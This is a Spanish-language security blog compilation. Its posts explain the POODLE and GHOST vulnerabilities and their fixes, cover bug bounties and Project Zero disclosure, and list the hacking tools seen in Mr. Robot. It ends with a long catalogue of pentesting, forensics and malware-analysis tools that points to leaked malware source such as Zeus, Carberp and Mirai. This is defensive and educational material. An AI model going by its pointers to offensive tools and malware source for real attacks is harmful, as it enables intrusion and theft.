      Los ingenieros que encontraron a Poodle (nombre que recibió la vulnerabilidad) son Bodo Möller, Thai Duong y Krzysztof Kotowicz, ingenieros del equipo de seguridad informática en Google. El nombre Poodle fue dado por su significado en inglés Padding Oracle On Downgraded Legacy Encryption.

      Como la mayor parte de la información publicada hasta el momento es muy técnica, hemos decidido publicar este artículo enfocándolo a todas aquellas personas que se han despertado oyendo hablar de Poodle, pero que no saben qué es ni cómo les afecta en su día a día. Empecemos por el principio:

      ¿Qué es SSL 3.0?

      SSL 3.0 fue la última revisión del protocolo de comunicación seguro SSL (“Secure Sockets Layers” por sus siglas en inglés y “Capa de Conexión Segura” en español) antes de que evolucionara y pasara a denominarse TLS (y de paso, empezar de nuevo con la versión 1.0). Su función principal es permitir el envío de claves de cifrado entre las aquellas aplicaciones que lo implementen, de manera que se establezca una conexión segura entre ellas que no pueda ser espiada.

      Por ejemplo, si queremos conectarnos a nuestro banco para realizar operaciones online, lo normal es que nuestro navegador solicite una conexión segura y la web de nuestro banco nos la proporcione. De esa forma, nadie debería poder acceder a nuestro usuario y contraseña mientras estamos conectados, por ejemplo desde una red Wi-Fi compartida con otros usuarios.

      Actualmente, la mayoría de aplicaciones (especialmente los navegadores web) están configuradas para utilizar SSL y TLS. No obstante, quien decide si una conexión es segura no es la web o el navegador, sino una entidad certificadora que se encarga de garantizar que esa conexión es segura mediante un certificado de seguridad.

      Cuando hablamos de Heartbleed hace unos meses, nuestro compañero Fernando de la Cuadra publicó un artículo explicando de forma sencilla qué es y cómo funciona SSL, por lo que recomendamos encarecidamente su lectura.

      A día de hoy, en realidad casi todas las conexiones a sitios "conocidos" o la gran mayoría de servidores y clientes se efectúan en TLS. Ahora depende de los actuales sistemas o software soportar una versión u otra de TLS. SSL, en porcentajes 0.3%, no es un protocolo muy usado, pero está ahí, latente, soportado y preparado para actuar cuando ambas partes no se ponen de acuerdo con TLS. Y ese es el problema que los investigadores proponen como caso de uso de la vulnerabilidad.

      ¿Cómo funciona Poodle?

      La vulnerabilidad descubierta por los investigadores de Google es diferente a Heartbleed, ya que no afecta a la parte servidor (que alojan, por ejemplo, páginas webs), sino a la parte cliente (navegadores de Internet, clientes de correo, etc.), lo que la hace menos grave y fácil de solucionar.

      Básicamente consiste en aprovecharse de una característica que hace que, cuando un intento de conexión segura falla, se proceda a intentar realizar de nuevo esa conexión pero con un protocolo de comunicación más antiguo. De esa forma, un atacante podría ocasionar intencionadamente errores de conexión en protocolos seguros como TLS 1.2, 1.1 y 1.0 y forzar así el uso de SSL 3.0 para aprovechar la nueva vulnerabilidad.

      Poodle basa su ataque sobre el modo CBC (Cifrado por bloques) lo que hace que este modo sea vulnerable a un ataque variante de Padding Oracle. La alternativa a CBC es usar un cifrado por flujo, RC4, pero este último ya fue condenado al destierro. En marzo de 2013 se publicó un ataque que permitía recuperar componentes de un mensaje cifrado con RC4 si estos componentes se repetían con cierta frecuencia. Pensemos en una cookie de sesión dentro de un mensaje HTTP.

      Podríamos decir que Poodle no está orientado a "hackear" nuestro sistema, sino que, a través de ataques MitM busca obtener la información que antes se enviaba cifrada y un atacante no podía descifrar.

      ¿Cómo se explota esta vulnerabilidad?

      Como vemos, es un ataque en dos tiempos. Primero se fuerza el uso de un protocolo no seguro y luego se aprovecha una vulnerabilidad en él. No obstante, para poder realizar este ataque se han de cumplir una serie de condiciones, y es que el atacante ha de estar conectado a la misma red que la víctima, por ejemplo, en una red Wi-Fi pública, para poder realizar lo que se conoce como un ataque de "hombre en el medio" e interceptar así las comunicaciones de la víctima.

      Además, para realizar un ataque de este tipo se requiere que JavaScript se esté ejecutando en el navegador, algo bastante común pero que puede desactivarse fácilmente. Esto limita su alcance, ya que si bien la mayoría de navegadores utilizados en sistemas operativos para ordenadores de sobremesa o portátiles incorporan JavasScript, no es el caso en muchos dispositivos móviles y sus aplicaciones.

      Imaginemos una red local, una víctima, sus secretos más codiciados y un atacante. La víctima se conecta a su banco, el atacante efectúa un hombre en el medio, se mete en la conversación del cliente con el banco y decide "estorbar" lo suficiente como para que el navegador de la víctima y el servidor del banco se cansen de negociar que versión de TLS y con el lio terminen usando SSL.

      Ahora que se está usando CBC como cifrado, debido entre otras cosas porque en una auditoría al banco le dijeron que se abstuviese de soportar RC4, el atacante solo tiene que capturar una buena cantidad de paquetes para que mediante un análisis comience a obtener "piezas" de esa conversación privada y haga trizas la privacidad.

      ¿Qué puede hacer un atacante que explote esta vulnerabilidad?

      Sobre el papel y aún a falta de conocer más detalles en el futuro, se puede utilizar Poodle para realizar una amplia variedad de ataques, pero quizá el más llamativo y que más puede afectar a los usuarios sea el secuestro de nuestras cookies de sesión o, lo que es lo mismo, conseguir registrarse en nuestra cuenta de cualquier servicio online (correo, redes sociales, banca online, etc.) sin necesidad de obtener previamente nuestro usuario y contraseña.

      De esta forma se podrían realizar robos de identidad y publicar mensajes en redes sociales en nuestro nombre, enviar correos sin nuestro permiso o realizar transferencias bancarias, aun sin haber obtenido nuestro usuario y contraseña. Este es el peligro más inmediato que se nos viene a la cabeza.

      ¿Existe alguna solución?

      Una vez ya hemos visto en qué consiste Poodle y cómo puede ser utilizada por un atacante, es hora de hablar de las posibles soluciones. Para ello hay que tener en cuenta que Poodle solo afecta a versiones antiguas de SSL (y SSL 3.0 tiene ya 15 años) y por eso trata de forzar este tipo de conexiones aunque tengamos nuestras aplicaciones configuradas para que utilicen la más reciente: TLS 1.2.

      Por eso, una de las mejores soluciones pasa por dejar de utilizar SSL 3.0 y todas sus versiones anteriores y usar solo TLS 1.0 y posteriores. De esta forma no se podría forzar que tanto el cliente como el servidor utilicen una versión insegura del protocolo.

      Dejar de utilizar SSL 3.0 en los servidores es una tarea que llevará tiempo, debido a que aún quedan muchos usuarios que utilizan aplicaciones que no soportan versiones posteriores a 3.0. Pensemos en los millones de usuarios que aún siguen utilizando Internet Explorer 6.0, por ejemplo. Sin embargo, es algo que se va a tener que hacer tarde o temprano, y algunas de las empresas más importantes encargadas de alojar un buen número de sitios web ya han anunciado que dejarán de soportar SSL 3.0 en breve. Además, Google aconseja habilitar el mecanismo TLS_FALLBACK_SCSV en servidores para evitar que un atacante produzca errores de conexión al usar el protocolo TLS y fuerce el uso de SSL 3.0.

      No obstante, como usuarios podemos evitar seguir usando SSL 3.0 en los navegadores de forma sencilla. Es muy probable que la mayoría de navegadores más utilizados saquen una actualización en breve que obligue a utilizar cifrado TLS 1.0 o posterior, pero también podemos forzarlo de forma manual siguiendo estas instrucciones:

      Mozilla Firefox: si escribimos about:config en la barra de direcciones de nuestro navegador Firefox, entraremos a un apartado de configuración donde podremos cambiar muchos parámetros de configuración. Es importante no tocar nada si no sabemos lo que estamos haciendo y dirigirnos únicamente a la siguiente línea:
      security.tls.version.min
      Una vez hayamos localizado esta línea, haremos doble clic sobre ella y cambiaremos el valor de 0 a 1, cerrando esa pestaña una vez hayamos realizado el cambio.

      Google Chrome: para forzar el uso exclusivo de TLS en Chrome, deberemos primero cerrar el navegador e ir al icono de acceso directo que tendremos en el escritorio y pulsar el botón derecho del ratón sobre él. Seleccionaremos la opción "Propiedades" y en la pestaña "Acceso Directo" nos colocaremos sobre el campo "Destino". 
      Es en ese campo donde deberemos añadir, al final de la ruta donde se encuentra el ejecutable de Chrome, la siguiente cadena:
      -ssl-version-min=tls1
      Internet Explorer: desactivar SSL en las opciones avanzadas del navegador.
      Tras realizar estos cambios no deberíamos observar ningún cambio mientras navegamos, puesto que prácticamente todos los servidores están preparados para utilizar TLS 1.0 o posterior, aunque si no nos vemos capacitados para realizar estos pasos, siempre podemos esperar a que los propios navegadores se actualicen y activen esta opción por nosotros.
      Conclusión

      Esta vulnerabilidad debería servir como una llamada de atención para dejar de utilizar un protocolo obsoleto que se desarrolló hace 15 años y que no está pensado para hacer frente a los desafíos de seguridad de hoy en día. Es por eso que esperamos una rápida reacción por parte de los desarrolladores de aplicaciones que todavía hacen uso de SSL 3.0 y que implementen el uso exclusivo de TLS, algo que solucionaría este problema de forma efectiva y sencilla.

      Más información:


      Actualización: Debida a esta vulnerabilidad, Mozilla tiene previsto desactivar la cifrado Secure Sockets Layer en su navegador Firefox 34, que será lanzado el 25 de noviembre.

      Fuente: Protegerse e Hispasec

      22 may 2015

      HackerOne: "Broker" para reportar bugs y ganar dinero con Bug Bounties

      HackerOne es una plataforma que facilita la comunicación entre el equipo de seguridad de una empresa con profesionales o con principiantes en la seguridad informática también llamados hackers. Gracias a HackerOne se han corregido miles de fallos y actualmente se ha pagado 2.49 Millones de Dólares o 2.30 Millones de Euros.

      Entre las empresas que podemos encontrar hay algunas muy famosas como Twitter, Yahoo!, Dropbox y la propia HackerOne inclusive. Además, hay un programa financiado por organizaciones preocupadas por la seguridad de los demás llamado Internet Bug Bounty, que básicamente está enfocado al reporte de bugs que afectan a todo Internet, como los casos de Heartbleed o ShellShock.

      Del dinero que se paga por los bugs descubiertos un 20% se lo lleva HackerOne, como broker de reporte. A cambio de ese 20% HackerOne se hace responsable de que al hacker le llegue todo el dinero, evitando los formularios de impuestos y demás quebraderos de cabeza. Por lo que tu equipo no tiene que preocuparse en que los hackers sean pagados y puede centrarse en trabajar.

      Fuente: Daniel Sesé - Un informatico en el lado del mal

      28 ene 2015

      GHOST bug crítico en Linux, con 14 años de antiguedad (PARCHEA!)

      Investigadores de la empresa de seguridad Qualys han descubierto un agujero de seguridad muy importante en la biblioteca de C de GNU Linux (glibc). La vulnerabilidad ya tiene nombre y imagen relacionada: GHOST (proviene de GetHOST), ha sido identificado como CVE-2015-0235 y permite tomar el control de sistemas Linux remotamente, sin conocer datos de autenticación como usuario y contraseña. Aquí se puede ver el video publicado por la empresa.

      La gravedad de la vulnerabilidad es comparable Heartbleed, Shellshock y POODLE. Qualys alertó a los principales distribuidores de Linux sobre el agujero de seguridad y la mayoría ya han lanzado las actualizaciones correspondientes. Josh Bressers, manager del equipo de seguridad de Red Hat dijo en una entrevista que "Red Hat fue avisado de esto hace una semana y ya están listas las actualizaciones para Red Hat Enterprise Linux (RHEL) 5, 6 y 7".
      The GNU C Library, más conocida como glibc es una implementación de la biblioteca C y forma parte del núcleo de Linux.
      Este agujero existe en todos los Linux con glibc-2.2, el cual fue lanzado el 10 de noviembre de 2000. Qualys encontró que el fallo había sido parcheado junto con una corrección menor entre los lanzamientos de glibc-2.17 y glibc-2.18 publicado 21 de mayo de 2013. Sin embargo, esta solución no fue clasificada como un problema de seguridad, y como resultado, muchas distribuciones estables aún tienen el bug. Se ha confirmado que las versiones desde 2.2 a 2.17 son vulnerables.

      Las distribuciones susceptibles de ataque incluyen 7 Debian (Wheezy), RHEL 5, 6 y 7, CentOS 6 y 7 y Ubuntu 12.04. Además de la solución de Red Hat, Debian actualmente está reparando sus distribuciones, Ubuntu ha parcheado el bug para 12.04 y 10.04 y, los parches para CentOS están en camino.

      La vulnerabilidad puede ser explotada mediante el uso de la función gethostbyname de glibc. Esta función se utiliza en casi todos los Linux cuando una computadora intenta acceder a otro equipo conectado a la red o, más comúnmente, al resolver un nombre de dominio mediante DNS.
      Para aprovechar esta vulnerabilidad, un atacante necesita provocar un desbordamiento de búfer mediante el uso de un argumento "hostname" no válido y entonces se permite ejecutar código arbitrario con los permisos del usuario que está ejecutando DNS. En definitiva, una vez que el atacante ha explotado GHOST, es capaz de tomar el control del sistema.

      "GHOST plantea un riesgo alto porque hace que sea increíblemente fácil tomar el control de un sistema. Por ejemplo, un atacante podría enviar un simple correo electrónico en un sistema basado en Linux y automáticamente obtener acceso completo a esa máquina", dijo Wolfgang Kandek de Qualys. "Dado el gran número de sistemas basados en glibc, creemos que esto es una vulnerabilidad de severidad alta y debe ser tratada inmediatamente. El mejor curso de acción para mitigar el riesgo es aplicar el parche brindado por el proveedor".

      Qualys ha desarrollado una prueba de concepto enviando un comando SMTP inválido al servidor de correo Exim, en el cual simplemente envían un correo electrónico creado especialmente y que permite ejecutar una shell remota en el Linux. Según Qualys, "esto ignora todas las protecciones existentes (como ASLR, PIE y NX) en sistemas de 32 bits y 64 bits".

      El consejo es actualizar Linux tan pronto como sea posible y reiniciar después parcheo porque gethostbyname es llamado por muchos procesos fundamentales, como Apache, Cups, Dovecot, Exim, GnuPG, isc-dhcp, lighttpd, mariadb/mysql, nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd, pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers, vsftpd, y xinetd.

      ¿Cómo saber si soy vulnerable?

      Esto es muy sencillo, simplemente se puede ejecutar un comando que utilice eglibc y observar la versión.
      Por ejemplo en Debian/Ubuntu, el comando ldd:
      ldd --version
      
      ldd (Ubuntu EGLIBC 2.11.1-0ubuntu7.12) 2.11.1
      Copyright (C) 2012 Free Software Foundation, Inc.
      
      En este caso el texto en rojo indica la versión de eglibc utilizada: la 2.11 que es vulnerable.

      En Red Hat y CentOS se puede utilizar rpm:
      rpm -q glibc

      Además, la Universidad de Chicago ha creado un sencillo script, basado en el original, para probar si se es vulnerable. Se puede descargar desde aquí o aquí. Una vez compilado con GCC, el script informa "vulnerable" o "not vulnerable".

      Este otro script SH también hace lo propio.

      Actualización: Red Hat, Debian, Ubuntu y Novell han publicado los parches respectivos.

      Más información:
      Fuente: ZDNet

      26 ene 2015

      ¿Es Google Project Zero (i)rresponsable publicando 0days y exploits de Windows y OS X?

      El año pasado, concretamente durante el mes de Julio, se anunció el nacimiento de Google Project Zero, una iniciativa de seguridad de Google para auditar en busca de vulnerabilidades en aplicaciones de otros fabricantes, incluyendo en esta lista software libre y software de código cerrado. El año pasado fue especialmente vertiginoso en términos de seguridad informática, todavía convulso por las revelaciones de todos los hackeos provenientes de la NSA, la aparición de fallos como Heartbleed, ShellShock, Poodle o el resto de bugs en software criptográfico, hicieron que las inversiones en seguridad empezaran a crecer.

      Google montó su equipo en busca de fallos en el software que ellos utilizan que, dicho sea de paso, pensando en una compañía del tamaño de Google es algo así como decir casi todo el software importante del planeta. En sus filas hay hackers de gran nivel y reconocimiento internacional, con varios Pwnie Awards entre ellos, e incluso GeoHot ha pasado a formar parte de este equipo que se dedica a buscar vulnerabilidades.

      La polémica viene con este grupo ha venido por otro lado, no con la búsqueda de los bugs, sino con la "medida de responsabilidad" que han añadido a la publicación de sus descubrimientos, en 0days de Windows y de OS X recientemente.

      Contenido completo en fuente original El Lado del Mal

      15 sept 2015

      Las herramientas y técnicas de los hackers de Mr. Robot

      En HackerTarget se entretuvieron en revisar todas las escenas de Mr. Robot, para ver qué herramientas y técnicas utilizan los hackers protagonistas en sus andanzas entre el bien y el mal a ambos lados de las consolas.

      Entre las más destacadas están todas estas:
      • Kali, una distribución especial de Linux para pruebas de penetración. Una herramienta poderosa que de hecho es «ilegal» en diversos países.
      • Wget, el programa típico para hacer peticiones HTTP y y descargar páginas para examinarlas.
      • El bug Shellshock para «entrar hasta la cocina».
      • John the Ripper, un clásico entre los clásicos para realizar la rutinaria tarea de crackear contraseñas protegidas por todo tipo de cifrados utilizando diccionarios, listas de palabras y otras técnicas.
      • Canbus, para quien necesite hackear un coche.
      • La técnica de dejar un USB perdido tirado en el suelo para que alguna víctima lo inserte en su ordenador.
      • Bluesniff
      • Meterpreter
      • Social Engineer Toolkit para crear sitios web falsos, lanzar phisings y correos falsos de manera sencilla.
      Aparte de todo esto a lo largo de la serie pueden verse algunos ejemplos y menciones a las técnicas de ingeniería social tan comunes como complemento a todo ataque técnico, con el protagonista llamando por teléfono para hacerse pasar por otra persona, extraer datos e información a base de preguntas con respuestas conocidas a las que se añaden otras preguntas importantes cuya respuesta se quiere averiguar.

      Definitivamente Mr. Robot es una serie que cuida mucho los detalles y en el terreno técnico lo están bordando: siempre dentro de lo que debe ser una historia entretenida y que no aburra. Teniendo en cuenta a los creadores de la mayor parte de las historias similares la fidelidad a la realidad simplemente les importa un pito y no contratan ni a un mísero consultor para que les recomiende unas pantallas decentes

      Fuente: Microsiervos

      27 may 2019

      Herramientas de Ethical Hacking y Pentesting

      Responsabilidad: el contenido de este artículo está destinado solo para fines de investigación en seguridad.

      Contenido

      Auditoría de código

      Análisis estático

      Brakeman: Un escáner de vulnerabilidad de seguridad de análisis estático para las aplicaciones de Ruby on Rails.
      ShellCheck: Una herramienta de análisis estático para scripts de shell.

      Criptografía

      FeatherDuster: Una herramienta automatizada y modular de criptoanálisis.
      RSATool: Genera clave privada con conocimiento de p y q.
      Xortool: Una herramienta para analizar el cifrado xor de varios bytes.

      Herramientas CTF

      CTFd: Fácilmente modificable y tiene todo lo que necesitas para ejecutar un CTF de estilo peligroso.
      FBCTF: Plataforma para organizar competiciones de Capture the Flag.
      Mellivora: un motor CTF escrito en PHP.
      OneGadget: Una herramienta para encontrar un gadget RCE en libc.so.6.
      NightShade: Un simple Framework de seguridad CTF.
      OpenCTF: CTF en una caja. Se requiere una configuración mínima.
      Pwntools: marco de CTF y biblioteca de desarrollo de exploits.
      Scorebot: Plataforma para CTFs por Legitbs (Defcon).
      V0lt - Security CTF Toolkit.

      Dockers

      Docker Bench for Security: Docker Bench for Security comprueba todas las pruebas automatizables en CIS Docker 1.6 Benchmark.
      docker pull diogomonica/docker-bench-security
      DVWA - La aplicación web Damn Vulnerable (DVWA) es una aplicación web PHP / MySQL que es muy vulnerable.
      docker pull citizenstig/dvwa
      Kali Linux: Esta imagen de Kali Linux Docker proporciona una instalación básica mínima de la última versión de Kali Linux Rolling Distribution.
      docker pull kalilinux/kali-linux-docker
      Metasploit: Software de prueba de penetración Metasploit Framework.
      docker pull bkimminich/juice-shop
      OWASP Juice Shop: Una aplicación web intencionalmente insegura para entrenamientos de seguridad escrita enteramente en Javascript que abarca todo el OWASP Top Ten y otros graves fallos de seguridad.
      docker pull citizenstig/nowasp
      OWASP Mutillidae II - Aplicación de práctica de prueba de pluma web OWASP Mutillidae II.
      docker pull citizenstig/nowasp
      OWASP NodeGoat: un entorno para conocer cómo los principales riesgos de seguridad de OWASP se aplican a las aplicaciones web desarrolladas con Node.js y cómo abordarlas de manera efectiva.
      git clone https://github.com/OWASP/NodeGoat.git docker-compose build && docker-compose u
      OWASP Railsgoat: Una versión vulnerable de Rails que sigue el Top 10 de OWASP.
      docker pull owasp/railsgoat
      OWASP Security Shepherd: Una plataforma de capacitación en seguridad para aplicaciones web y móviles.
      docker pull ismisepaul/securityshepherd
      OWASP WebGoat: Una aplicación web deliberadamente insegura.
      docker pull danmx/docker-owasp-webgoat
      OWASP ZAP - Versión actual de proxy de ataque owasp zed insertado en un contenedor.
      docker pull owasp/zap2docker-stable
      Security Ninjas: Un programa de capacitación en seguridad de aplicaciones de código abierto.
      docker pull opendns/security-ninjas
      SpamScope - SpamScope (herramienta avanzada de análisis de correo no deseado) con Elasticsearch.
      docker pull fmantuano/spamscope-elasticsearch
      Instalación Vulnerable de WordPress - Instalación vulnerable de WordPress.
      docker pull wpscanteam/vulnerablewordpress
      Vulnerabilidad como servicio Heartbleed: Vulnerabilidad como servicio: CVE 2014-0160.
      docker pull hmlio/vaas-cve-2014-0160
      Vulnerabilidad como servicio: Shellshock - Vulnerabilidad como servicio: CVE 2014-6271.
      docker pull hmlio/vaas-cve-2014-6271
      WPScan - WPScan es un escáner de vulnerabilidad WordPress de recuadro negro.
      docker pull wpscanteam/wpscan

      Análisis Forense

      Forense de archivos

      Autopsy: Una plataforma forense digital e interfaz gráfica para The Sleuth Kit y otras herramientas forenses digitales.
      DFF: Un marco forense que viene con línea de comando e interfaces gráficas. DFF se puede utilizar para investigar discos duros y memoria volátil y crear informes sobre las actividades del usuario y del sistema.
      Docker Explorer: Una herramienta para ayudar a la adquisiciones forense de docker sin conexión.
      Hadoop_framework: Un sistema prototipo que utiliza Hadoop para procesar imágenes del disco duro.
      OSXCollector: Un conjunto de herramientas de análisis y recopilación de evidencia forense para OS X.
      Scalpel: Herramienta de talla de datos de código abierto.
      Shellbags: Para investigar los archivos NT_USER.dat.
      Sleuthkit: Una biblioteca y colección de herramientas forenses digitales de línea de comando.

      Respuesta ante incidentes

      Hunter: Un entorno de búsqueda de amenazas / análisis de datos basado en Python, Pandas, PySpark y Jupyter Notebook.

      Análisis en vivo

      OS X Auditor: OS X Auditor es una herramienta informática forense gratuita de Mac OS X.
      Windows-event-forwarding: Un repositorio para usar el reenvío de eventos de Windows para la detección y respuesta a incidentes.

      Análisis forense de memoria

      Rekall - Marco de análisis de memoria desarrollado por Google.
      Volacity: extrae artefactos digitales de muestras de memoria volátil (RAM).

      Análisis forense de moviles

      Android Forensic Toolkit: Permite extraer registros de SMS, historial de llamadas, fotos, historial de navegación y contraseña desde un teléfono Android.
      Mem: Herramienta utilizada para volcar memoria desde dispositivos Android.

      Análisis Forense de red

      Dshell: Un marco de análisis forense de red.
      Passivedns: Un detector de red que registra todas las respuestas del servidor DNS para usar en una configuración pasiva de DNS.

      Misc

      Diffy: Una herramienta digital de análisis forense y respuesta ante incidentes (DFIR) desarrollada por el Equipo de Inteligencia y Respuesta de Seguridad de Netflix (SIRT). Permite que un investigador forense alcance rápidamente un compromiso en las instancias de la nube durante un incidente y clasifique esas instancias para las acciones de seguimiento.
      HxD: Editor hexadecimal que, además de la edición y modificación del disco sin formato de la memoria principal (RAM), maneja archivos de cualquier tamaño.
      Libfvde - Biblioteca y herramientas para acceder a volúmenes encriptados de FileVault Drive Encryption (FVDE).

      Ciberinteligencia

      Attackintel: Una secuencia de comandos python para consultar la API MITER ATT&CK para tácticas, técnicas, mitigaciones y métodos de detección para grupos de amenazas específicos.
      VIA4CVE: Un agregador de la base de datos de vulnerabilidades de proveedores conocidos para admitir la expansión de información con CVE.

      Librerias

      C

      Libdnet: Proporciona una interfaz simplificada y portátil para varias rutinas de red de bajo nivel, incluida la manipulación de direcciones de red, kernel arp cache y búsqueda y manipulación de tabla de rutas, firewalls de red, búsqueda y manipulación de la interfaz de red, tunneling IP y paquetes de IP sin procesar y Ethernet transmisión.

      Java

      Libsignal-service-java : Una biblioteca Java / Android para comunicarse con el servicio de mensajes de señal.

      Python

      Amodem: Audio MODEM Communication Library en Python.
      Dpkt: Creación / análisis rápido y simple de paquetes, con definiciones para los protocolos TCP / IP básicos.
      Pcapy: Un módulo de extensión de Python que interactúa con la biblioteca de captura de paquetes libpcap. Pcapy permite que las secuencias de comandos python capturen paquetes en la red. Pcapy es muy eficaz cuando se utiliza junto con un paquete de manejo de paquetes como Impacket, que es una colección de clases de Python para construir y diseccionar paquetes de red.
      PyBFD :Interfaz de Python con la biblioteca del Descriptor de Archivo Binario (BFD) de GNU.
      Pynids: Un contenedor de Python para Libnids, una biblioteca del Sistema de Detección de Intrusos de Red que ofrece rastreo, desfragmentación de IP, reensamblaje de flujo TCP y detección de escaneo de puerto TCP. Deje que sus propias rutinas python examinen las conversaciones de red.
      Pypcap: Este es un contenedor Python simplificado orientado a objetos para libpcap.
      PyPDF2: Una utilidad para leer y escribir archivos PDF con Python.
      Python-ptrace: Enlace de Python de la biblioteca ptrace.
      RDPY: RDPY es una implementación pura de Python del protocolo Microsoft RDP (Protocolo de escritorio remoto) (lado del cliente y del servidor).
      Scapy: un programa interactivo de manipulación de paquetes basado en Python y biblioteca.

      Ruby

      Secureheaders: Encabezados relacionados con la seguridad, todo en una joya.

      Distribuciones LiveCD de ciberseguridad

      Android Tamer: plataforma virtual / en vivo para profesionales de seguridad de Android.
      ArchStrike: un repositorio de Arch Linux para entusiastas y profesionales de la seguridad.
      BackBox: Distribución basada en Ubuntu para pruebas de penetración y evaluaciones de seguridad.
      BlackArch: Distribución basada en Arch Linux para probadores de penetración e investigadores de seguridad.
      BOSSLive: Una distribución india de GNU / Linux desarrollada por CDAC y personalizada para satisfacer el entorno digital de la India. Es compatible con la mayoría de los idiomas de la India.
      DEFT Linux - Suite dedicada a la respuesta ante incidentes y análisis forense digital.
      Fedora Security Lab: Un entorno de prueba seguro para trabajar en auditorías de seguridad, análisis forense, rescate de sistemas y metodologías de prueba de seguridad en universidades y otras organizaciones.
      Kali: Una distribución de Linux diseñada para análisis forense digital y pruebas de penetración.
      NST: distribución de Network Security Toolkit.
      Ophcrack: Un cracker de contraseñas gratuito de Windows basado en tablas rainbow. Es una implementación muy eficiente de tablas de arcoiris realizadas por los inventores del método. Viene con una interfaz gráfica de usuario y se ejecuta en múltiples plataformas.
      Parrot: Distribución de seguridad GNU / Linux diseñada con pentesting en la nube y seguridad de la IoT en mente.
      Pentoo: Livecd centrado en la seguridad basado en Gentoo.
      REMnux: Toolkit para ayudar a los analistas de malware con el software malicioso de ingeniería inversa.

      Malware

      Análisis dinámico de malware

      Androguard: Ingeniería inversa, análisis de malware y goodware de aplicaciones de Android.
      Cuckoo Sandbox: Un sistema automatizado de análisis dinámico de malware.
      CuckooDroid :Análisis automatizado de malware de Android con Cuckoo Sandbox.
      DECAF : Abreviatura de Dynamic Ejecutable Code Analysis Framework, es una plataforma de análisis binario basada en QEMU.
      DroidBox: Análisis dinámico de aplicaciones de Android.
      Hooker: Un proyecto de código abierto para análisis dinámicos de aplicaciones de Android.
      Jsunpack-n: Emula la funcionalidad del navegador cuando visita una URL.
      Magento-malware-scanner: Una colección de reglas y ejemplos para detectar el malware Magento.
      Malzilla: Las páginas web que contienen exploits a menudo usan una serie de redireccionamientos y códigos ofuscados para que sea más difícil de seguir para alguien. MalZilla es un programa útil para explorar páginas maliciosas. Permite elegir nuestro propio agente de usuario y referencia, y tiene la capacidad de usar proxies. Muestra la fuente completa de páginas web y todos los encabezados HTTP. Te da varios decodificadores para intentar desofuscar javascript también.
      ProbeDroid: Un kit de instrumentación binario dinámico dirigido a Android (Lollipop) 5.0 y superior.
      PyEMU: Emulador IA-32 completamente programable, útil para el análisis de malware.
      Uitkyk: Marco de análisis de memoria de tiempo de ejecución para identificar malware de Android.
      WScript Emulator: Emulador / rastreador de la funcionalidad de Windows Script Host.

      Honeypots

      Basic-auth-pot : Autenticación básica de HTTP honeyPot.
      Conpot : ICS / SCADA honeypot.
      Cowrie: SSH honeypot, basado en Kippo.
      Elastichoney: Un simple honeypot Elasticsearch.
      ESPot: Un honeypot de Elasticsearch escrito en NodeJS, para capturar todos los intentos de explotar CVE-2014-3120.
      Delilah: Un Honeypot Elasticsearch escrito en Python.
      Dionaea: Honeypot diseñado para atrapar malware.
      Glastopf: Aplicación web Honeypot.
      Glutton : Todos comiendo honeypot.
      Honeyd : Crea una honeynet virtual.
      HoneyPress: Python basado en WordPress honeypot en un contenedor acoplable.
      HonnyPotter: Un honeypot de inicio de sesión de WordPress para recopilar y analizar intentos de inicio de sesión fallidos.
      Maildb - Aplicación web de Python para analizar y rastrear archivos HTTP y Pcap http.
      MHN: Gestión de sensores multi-snort y honeypot, utiliza una red de máquinas virtuales, instalaciones SNORT de huella pequeña, dionae sigilosas y un servidor centralizado para administración.
      Mnemosyne: Un normalizador para datos de honeypot, es compatible con Dionaea.
      MongoDB-HoneyProxy: Un proxy de honeypot para mongodb. Cuando se ejecuta, esto servirá de proxy y registrará todo el tráfico a un servidor ficticio mongodb.
      MysqlPot: Un honeypot de mysql, todavía muy temprano.
      Nodepot: Un nodo de aplicación web de nodejs.
      NoSQLPot: NoSQL Honeypot Framework.
      Phoneyc: Implementación de HoneyClient de Pure Python.
      Phpmyadmin_honeypot: Un honeypot phpMyAdmin simple y efectivo.
      Servletpot: Aplicación web Honeypot.
      Shadow Daemon: Un firewall de aplicaciones web modular / High-Interaction Honeypot para aplicaciones PHP, Perl y Python.
      Smart-honeypot: PHP Script que demuestra una olla de miel inteligente.
      SpamScope: Fast Advanced Spam Analysis Tool.
      Thug: HoneyClient de baja interacción, para la investigación de sitios web maliciosos.
      Wordpot: Un WordPress Honeypot.
      Wp-smart-honeypot: Plugin de WordPress para reducir el spam de comentarios con un honeypot más inteligente.

      Inteligencia

      Módulos MISP: Módulos para servicios de expansión, importación y exportación en MISP.
      Passivedns-client: Proporciona una biblioteca y una herramienta de consulta para consultar varios proveedores pasivos de DNS.
      Rt2jira : Convierte boletos RT a boletos JIRA.

      Ops de Ciberseguridad

      Al-khaser: técnicas de malware público utilizadas en la naturaleza: máquina virtual, emulación, depuradores, detección de espacio aislado.
      CapTipper: Una herramienta de python para analizar, explorar y revivir el tráfico malicioso de HTTP.
      CSCGuard: Protege y registra el uso sospechoso y malicioso de .NET CSC.exe y Runtime C # Compilation.
      Google-play-crawler: Google-play-crawler es simplemente una herramienta de Java para buscar aplicaciones de Android en GooglePlay y también descargarlas.
      Googleplay-api: Una API de Python no oficial que nos permite buscar, explorar y descargar aplicaciones de Android de Google Play (anteriormente Android Market).
      ImaginaryC2: Una herramienta de python que tiene como objetivo ayudar en el análisis conductual (de red) del malware. Imaginary C2 aloja un servidor HTTP que captura las solicitudes HTTP hacia dominios / IP seleccionados selectivamente. Además, la herramienta tiene como objetivo facilitar la reproducción de las respuestas de Command-and-Control capturadas / cargas útiles servidas.
      FakeNet-NG: Una herramienta de análisis de red dinámica de próxima generación para analistas de malware y probadores de penetración. Es de código abierto y está diseñado para las últimas versiones de Windows.
      Malboxes: Crea análisis de malware Windows VM para que no sea necesario.
      Mquery: Acelerador de consultas de malware YARA (web frontend).
      Node-appland: Herramienta NodeJS para descargar APK de appland.
      Node-aparatoide: NodeJS para descargar APK de aptoide.
      Node-google-play: Llama a las API de Google Play desde el node.

      Código fuente

      Android-malware: Colección de muestras de malware de Android.
      Carberp: Carberp gastó el código fuente.
      Fancybear: Código Fuente Fancy Bear.
      Mirai: Código fuente de Mirai filtrado para fines de investigación / desarrollo de la IoC.
      Morris Worm: el código fuente original de Morris Worm.
      TinyNuke: troyano bancario estilo Zeus.
      Zeus: Zeus versión 2.0.8.9, se filtró en 2011.

      Análisis estático de Malware

      Androwarn: Detecta y advierte al usuario sobre posibles comportamientos maliciosos desarrollados por una aplicación de Android.
